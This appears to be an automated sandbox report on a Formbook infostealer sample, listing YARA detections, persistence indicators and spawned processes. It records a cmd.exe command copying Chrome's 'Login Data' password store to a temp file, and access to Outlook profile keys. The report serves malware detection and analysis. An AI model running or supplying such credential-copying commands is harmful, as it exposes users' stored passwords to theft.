Source: AT113020.exe, 00000001.00000002.242796472.0000000004790000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs AT113020.exe
Yara signature match
Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.291050180.0000000004AD7000.00000020.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.291050180.0000000004AD7000.00000020.00000001.sdmp, type: MEMORY Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.240199422.00000000027E7000.00000020.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000001.00000002.240199422.00000000027E7000.00000020.00000001.sdmp, type: MEMORY Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.275922238.0000000002807000.00000020.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000005.00000002.275922238.0000000002807000.00000020.00000001.sdmp, type: MEMORY Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: C:\Users\user\AppData\Local\fccA.url, type: DROPPED Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\fccA.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\fccA.url, type: DROPPED Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/6@36/13
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0042A11C GetLastError,FormatMessageA, 1_2_0042A11C
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00409576 GetDiskFreeSpaceA, 1_2_00409576
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0041A2E8 FindResourceA, 1_2_0041A2E8
Source: C:\Users\user\Desktop\AT113020.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\DB1
Source: C:\Users\user\Desktop\AT113020.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\AT113020.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\AT113020.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\explorer.exe File read: C:\Users\user\Searches\desktop.ini
Source: C:\Users\user\Desktop\AT113020.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\AT113020.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\AT113020.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\AT113020.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: AT113020.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\AT113020.exe File read: C:\Users\user\Desktop\AT113020.exe
Source: unknown Process created: C:\Users\user\Desktop\AT113020.exe 'C:\Users\user\Desktop\AT113020.exe'
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AT113020.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\msdt.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
